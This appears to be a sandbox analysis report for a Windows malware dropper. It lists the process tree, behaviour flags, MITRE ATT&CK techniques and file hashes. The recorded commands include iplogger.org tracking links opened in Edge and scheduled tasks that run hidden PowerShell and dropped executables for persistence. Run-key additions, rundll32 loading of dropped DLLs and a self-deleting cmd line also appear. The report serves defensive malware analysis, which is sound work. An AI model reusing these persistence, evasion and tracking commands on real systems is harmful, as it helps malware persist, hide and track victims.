"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15807687227882503129,7460875559759973443,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
3⤵
PID:5244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15807687227882503129,7460875559759973443,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX4
2⤵
- Suspicious use of WriteProcessMemory
PID:4760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:1072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,7636186378567947411,2026427798654000294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7636186378567947411,2026427798654000294,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
3⤵
PID:4456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RchC4
2⤵
- Suspicious use of WriteProcessMemory
PID:2328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:1624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,10025933613193351639,9566294678626947357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,10025933613193351639,9566294678626947357,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
3⤵
PID:2220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC4
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:1740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
3⤵
PID:4728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
3⤵
PID:5568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
3⤵
PID:5052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
3⤵
PID:5628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
3⤵
PID:1824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
3⤵
PID:816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
3⤵
PID:3420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
3⤵
PID:5168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
3⤵
PID:2128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
3⤵
PID:3492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
3⤵
PID:5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
3⤵
PID:1076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
3⤵
PID:644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7308 /prefetch:8
3⤵
PID:3192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7468 /prefetch:8
3⤵
PID:2040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
3⤵
PID:5072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
3⤵
PID:6024

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1676 /prefetch:8
3⤵
PID:157332

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:157376

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7f73a5460,0x7ff7f73a5470,0x7ff7f73a5480
4⤵
PID:157400

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1676 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8732 /prefetch:8
3⤵
PID:6192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1055917450481292633,17369237239662097694,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8308 /prefetch:2
3⤵
PID:6252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1nCCJ4
2⤵
- Suspicious use of WriteProcessMemory
PID:3572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x9c,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:1124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,12611032552215489881,14303484769661298119,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
3⤵
PID:5124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,12611032552215489881,14303484769661298119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
3⤵
PID:5308

C:\Program Files (x86)\Company\NewProduct\real.exe
"C:\Program Files (x86)\Company\NewProduct\real.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1352
3⤵
- Program crash
PID:5432

C:\Program Files (x86)\Company\NewProduct\F0geI.exe
"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
2⤵
- Executes dropped EXE
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 552
3⤵
- Program crash
PID:5752

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Program Files (x86)\Company\NewProduct\romb_ro.exe
"C:\Program Files (x86)\Company\NewProduct\romb_ro.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 1276
3⤵
- Program crash
PID:3008

C:\Program Files (x86)\Company\NewProduct\safert44.exe
"C:\Program Files (x86)\Company\NewProduct\safert44.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Program Files (x86)\Company\NewProduct\tag.exe
"C:\Program Files (x86)\Company\NewProduct\tag.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Users\Admin\AppData\Local\Temp\bbc.exe
"C:\Users\Admin\AppData\Local\Temp\bbc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:157240

C:\Users\Admin\AppData\Local\Temp\iog.exe
"C:\Users\Admin\AppData\Local\Temp\iog.exe"
3⤵
- Executes dropped EXE
PID:1688

C:\ProgramData\svchost.exe
"C:\ProgramData\svchost.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:5952

C:\Windows\SysWOW64\schtasks.exe
/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"
5⤵
- Creates scheduled task(s)
PID:75908

C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:76008

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:5528

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
5⤵
- Creates scheduled task(s)
PID:28668

C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
2⤵
- Executes dropped EXE
PID:3936

C:\Program Files (x86)\Company\NewProduct\pigmo.exe
"C:\Program Files (x86)\Company\NewProduct\pigmo.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5604

C:\Windows\SysWOW64\Rundll32.exe
Rundll32.exe C:\Users\Admin\AppData\Local\Temp\libnspr4.dll,PR_DestroyRWLock
3⤵
- Loads dropped DLL
PID:4808

C:\Windows\SysWOW64\Rundll32.exe
Rundll32.exe C:\Users\Admin\AppData\Local\Temp\clip.dll,PR_DestroyRWLock
3⤵
- Loads dropped DLL
PID:3876

C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe
"C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5760

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RqCC4
2⤵
PID:5144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:5884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RwCC4
2⤵
PID:6076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:2408

C:\Program Files (x86)\Company\NewProduct\EU1.exe
"C:\Program Files (x86)\Company\NewProduct\EU1.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im EU1.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\EU1.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:3716

C:\Windows\SysWOW64\taskkill.exe
taskkill /im EU1.exe /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:6168

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3444 -ip 3444
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4028 -ip 4028
1⤵
PID:368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2144 -ip 2144
1⤵
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe" Name host ValueOnly True
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:1260

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4212

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Filesize
290KB

MD5
8ab8fc20b7ab8b18bf0f474cc0156523

SHA1
21b922f6dcd49b67b5b3abc9603ec90835e7a20d

SHA256
b8849a951aadc7c35e1d1b8c57064b49a5eddf54928419b21f18584263162fca

SHA512
ab1ffba707911c50b2ac609c0736560ad2a37dd71f87597af5a87eae3c1811309f3973ecfc0b68cb5d234dd374d771e55637bd84748291758f932dc088def9d2

Download Submit
